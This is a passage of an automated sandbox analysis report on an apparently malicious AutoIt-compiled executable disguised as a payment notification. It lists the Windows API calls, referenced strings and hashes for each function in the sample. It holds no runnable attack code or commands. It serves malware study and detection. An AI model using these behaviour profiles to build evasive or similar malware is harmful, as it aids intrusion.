                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                              • Instruction ID: ab7c82010646c3e76c941db376efecdecccf7677c9ff78972cfd57d319dfe055
                                                                              • Opcode Fuzzy Hash: f6fdcbc2a51259700c4e62ce3b284bf4f2e34d08fb18e42b01a58d9aaf2677c3
                                                                              • Instruction Fuzzy Hash: 93B18A72608341AFD714DF69C884B6ABBE4FF85350F00891DF99D9B2A1DB71E844CB92
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F8968
                                                                              • GetSystemMetrics.USER32(00000007), ref: 008F8970
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008F899B
                                                                              • GetSystemMetrics.USER32(00000008), ref: 008F89A3
                                                                              • GetSystemMetrics.USER32(00000004), ref: 008F89C8
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008F89E5
                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 008F89F5
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008F8A28
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008F8A3C
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 008F8A5A
                                                                              • GetStockObject.GDI32(00000011), ref: 008F8A76
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008F8A81
                                                                                • Part of subcall function 008F912D: GetCursorPos.USER32(?), ref: 008F9141
                                                                                • Part of subcall function 008F912D: ScreenToClient.USER32(00000000,?), ref: 008F915E
                                                                                • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000001), ref: 008F9183
                                                                                • Part of subcall function 008F912D: GetAsyncKeyState.USER32(00000002), ref: 008F919D
                                                                              • SetTimer.USER32(00000000,00000000,00000028,008F90FC), ref: 008F8AA8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 53e1587b705895e0509d351aa78924b1f774d9b88ed8c55e66efb2cb4eb2f6cf
                                                                              • Instruction ID: e26433267ee8348d56717da6e329af477b32a26ab8367d929a9f56f5fac0102e
                                                                              • Opcode Fuzzy Hash: 53e1587b705895e0509d351aa78924b1f774d9b88ed8c55e66efb2cb4eb2f6cf
                                                                              • Instruction Fuzzy Hash: 6BB19D72A14209EFDB14DFA8DD95BAE3BB5FB48314F104229FA15E7290DB70A940CF51
                                                                              APIs
                                                                                • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00941114
                                                                                • Part of subcall function 009410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941120
                                                                                • Part of subcall function 009410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 0094112F
                                                                                • Part of subcall function 009410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00940B9B,?,?,?), ref: 00941136
                                                                                • Part of subcall function 009410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0094114D
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00940DF5
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00940E29
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00940E40
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 00940E7A
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00940E96
                                                                              • GetLengthSid.ADVAPI32(?), ref: 00940EAD
                                                                              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00940EB5
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00940EBC
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00940EDD
                                                                              • CopySid.ADVAPI32(00000000), ref: 00940EE4
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00940F13
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00940F35
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00940F47
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F6E
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940F75
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F7E
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940F85
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00940F8E
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940F95
                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00940FA1
                                                                              • HeapFree.KERNEL32(00000000), ref: 00940FA8
                                                                                • Part of subcall function 00941193: GetProcessHeap.KERNEL32(00000008,00940BB1,?,00000000,?,00940BB1,?), ref: 009411A1
                                                                                • Part of subcall function 00941193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00940BB1,?), ref: 009411A8
                                                                                • Part of subcall function 00941193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00940BB1,?), ref: 009411B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                              • String ID:
                                                                              • API String ID: 4175595110-0
                                                                              • Opcode ID: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                              • Instruction ID: 020daf13fa3b4524148803b93d1cf63770c0ddc7a950a9c88c1348a881d17bde
                                                                              • Opcode Fuzzy Hash: 1705eaea50a276dce168911f91caad62fe75a973a9b5c6d3c5963000c9002510
                                                                              • Instruction Fuzzy Hash: 52716FB290420AABDF209FA4DC44FAEBBBCBF84300F044169FA19A7191D7359945CBA0
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0096C4BD
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097CC08,00000000,?,00000000,?,?), ref: 0096C544
                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0096C5A4
                                                                              • _wcslen.LIBCMT ref: 0096C5F4
                                                                              • _wcslen.LIBCMT ref: 0096C66F
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0096C6B2
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0096C7C1
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0096C84D
                                                                              • RegCloseKey.ADVAPI32(?), ref: 0096C881
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0096C88E
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0096C960
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 9721498-966354055
                                                                              • Opcode ID: 8062418caa3da162afe22340d473111dd9019075c27816ec107584514e85cc6c
                                                                              • Instruction ID: c39bf6e6942ec007eb2f07c387782331859bca75327207e1c18b2389c0fd3979
                                                                              • Opcode Fuzzy Hash: 8062418caa3da162afe22340d473111dd9019075c27816ec107584514e85cc6c
                                                                              • Instruction Fuzzy Hash: 921269756082019FDB14DF19C881A2AB7E5FF89714F04885CF99A9B3A2DB31FD41CB82
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009709C6
                                                                              • _wcslen.LIBCMT ref: 00970A01
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00970A54
                                                                              • _wcslen.LIBCMT ref: 00970A8A
                                                                              • _wcslen.LIBCMT ref: 00970B06
                                                                              • _wcslen.LIBCMT ref: 00970B81
                                                                                • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                                • Part of subcall function 00942BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00942BFA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                              • API String ID: 1103490817-4258414348
                                                                              • Opcode ID: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                              • Instruction ID: bb237c1122d6120cc16094bf79e7dfe023abfa73be446c902dae69fe19dec7e1
                                                                              • Opcode Fuzzy Hash: 408b4dd5e23d4aca2928ae5eafcc5041dfdfff6f221cf8dbf896c3602537a658
                                                                              • Instruction Fuzzy Hash: A9E16632208341CFCB24DF29C45192AB7E5FFD9714F148958F89A9B2A2D730EE45CB82
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$BuffCharUpper
                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                              • API String ID: 1256254125-909552448
                                                                              • Opcode ID: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                              • Instruction ID: 8c4459560493e6310f950bd8dbcae5e27c133d2ef2dd6cd236751bcfa094dc9b
                                                                              • Opcode Fuzzy Hash: 07cb7cb076872b9e5aa78e6f1e1b01786d2129a87a2798f39cb2769b28823ade
                                                                              • Instruction Fuzzy Hash: B57117B260016A8BCB20DEBCCD516BF3399AFA1754F150528FCE6DB284E635CD40D3A1
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0097835A
                                                                              • _wcslen.LIBCMT ref: 0097836E
                                                                              • _wcslen.LIBCMT ref: 00978391
                                                                              • _wcslen.LIBCMT ref: 009783B4
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009783F2
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0097361A,?), ref: 0097844E
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978487
                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009784CA
                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00978501
                                                                              • FreeLibrary.KERNEL32(?), ref: 0097850D
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0097851D
                                                                              • DestroyIcon.USER32(?), ref: 0097852C
                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00978549
                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00978555
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                              • String ID: .dll$.exe$.icl
                                                                              • API String ID: 799131459-1154884017
                                                                              • Opcode ID: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                              • Instruction ID: 5392ec6da03866de8e1c0166535c5e0d954c4588b977fb8ce0a243bef75b9ab6
                                                                              • Opcode Fuzzy Hash: 1a17e91991b1d30dc8efcdaa8ec9364956aec7ff4de4caabbba3b9b9366e50be
                                                                              • Instruction Fuzzy Hash: 6661D0B2644205BEEB14DF64CC8ABBF77ACFB44B11F108549F919D60E1DBB4A980D7A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 0-1645009161
                                                                              • Opcode ID: 130dac210a322ab66eca17c7526f008890287cf13fdf67bc7dfd6f6968ebb9dc
                                                                              • Instruction ID: 5b4a89b3e3d20b8770132fbfbf269f92867c1f182370e53a97fcd215d91e8236
                                                                              • Opcode Fuzzy Hash: 130dac210a322ab66eca17c7526f008890287cf13fdf67bc7dfd6f6968ebb9dc
                                                                              • Instruction Fuzzy Hash: 4281D171604219BFDB21AF65DC42FAF37A8FF96304F054024F909EA196EB70DA51C7A1
                                                                              APIs
                                                                              • LoadIconW.USER32(00000063), ref: 00945A2E
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00945A40
                                                                              • SetWindowTextW.USER32(?,?), ref: 00945A57
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00945A6C
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00945A72
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00945A82
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00945A88
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00945AA9
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00945AC3
                                                                              • GetWindowRect.USER32(?,?), ref: 00945ACC
                                                                              • _wcslen.LIBCMT ref: 00945B33
                                                                              • SetWindowTextW.USER32(?,?), ref: 00945B6F
                                                                              • GetDesktopWindow.USER32 ref: 00945B75
                                                                              • GetWindowRect.USER32(00000000), ref: 00945B7C
                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00945BD3
                                                                              • GetClientRect.USER32(?,?), ref: 00945BE0
                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00945C05
                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00945C2F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                              • String ID:
                                                                              • API String ID: 895679908-0
                                                                              • Opcode ID: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                              • Instruction ID: 7cb1cb004e8e70506b8541f405d11df5015674f2eb64001ba2fb0ee8d9f5a1b7
                                                                              • Opcode Fuzzy Hash: fc5388e9e77125514346ceddbeb00f9334c3be68c46f9b8a1cad4a65492540d0
                                                                              • Instruction Fuzzy Hash: C5717C71900B09AFDB20DFA8CE85E6EBBF9FF48704F114A1CE586A25A1D775E940CB10
                                                                              APIs
                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009000C6
                                                                                • Part of subcall function 009000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(009B070C,00000FA0,A74B209B,?,?,?,?,009223B3,000000FF), ref: 0090011C
                                                                                • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009223B3,000000FF), ref: 00900127
                                                                                • Part of subcall function 009000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009223B3,000000FF), ref: 00900138
                                                                                • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0090014E
                                                                                • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0090015C
                                                                                • Part of subcall function 009000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0090016A
                                                                                • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00900195
                                                                                • Part of subcall function 009000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009001A0
                                                                              • ___scrt_fastfail.LIBCMT ref: 009000E7
                                                                                • Part of subcall function 009000A3: __onexit.LIBCMT ref: 009000A9
                                                                              Strings
                                                                              • InitializeConditionVariable, xrefs: 00900148
                                                                              • WakeAllConditionVariable, xrefs: 00900162
                                                                              • kernel32.dll, xrefs: 00900133
                                                                              • SleepConditionVariableCS, xrefs: 00900154
                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00900122
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                              • API String ID: 66158676-1714406822
                                                                              • Opcode ID: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
                                                                              • Instruction ID: 0c25e94b647f3e5a6ba9e183c9b154ee8945522f122c3881eed56263b03707cd
                                                                              • Opcode Fuzzy Hash: 7918f89307d60963ad5baefd8b02c012ae62bbc02a9ec8af9477d2c2bda33536
                                                                              • Instruction Fuzzy Hash: F821297365C7106FD7205BB4AC4AB6A73A8EFC6B64F00413AF909E72D1DF7098009A90
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 176396367-1603158881
                                                                              • Opcode ID: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
                                                                              • Instruction ID: 22e996ddf934af75e2f4891e1597d999a71b33ea2fd5e63b9a33bc259995b6b9
                                                                              • Opcode Fuzzy Hash: 4e3a3b148982f0ba8b0942e441055e2bf00e267df2b25619cb7299dc79206d7b
                                                                              • Instruction Fuzzy Hash: 75E1F532A00516ABCB289F78C451FEDBBB8FF45710F54C129E566E7290DB70AE8587A0
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(00000000,00000000,0097CC08), ref: 00954527
                                                                              • _wcslen.LIBCMT ref: 0095453B
                                                                              • _wcslen.LIBCMT ref: 00954599
                                                                              • _wcslen.LIBCMT ref: 009545F4
                                                                              • _wcslen.LIBCMT ref: 0095463F
                                                                              • _wcslen.LIBCMT ref: 009546A7
                                                                                • Part of subcall function 008FF9F2: _wcslen.LIBCMT ref: 008FF9FD
                                                                              • GetDriveTypeW.KERNEL32(?,009A6BF0,00000061), ref: 00954743
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                              • API String ID: 2055661098-1000479233
                                                                              • Opcode ID: ab7dba65affa20ebe7dd391cb70c7c54d82c3466c34f6c297b9958b32d1b1e4c
                                                                              • Instruction ID: 26c53baa0af21e40001631192da74509bb44a69a8bfde2b899d56d865e7bdf82
                                                                              • Opcode Fuzzy Hash: ab7dba65affa20ebe7dd391cb70c7c54d82c3466c34f6c297b9958b32d1b1e4c
                                                                              • Instruction Fuzzy Hash: D5B138316083029FC750DF2AC890A6AB7E8FF96759F50491DF996C7291E730DC89CB92
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0096B198
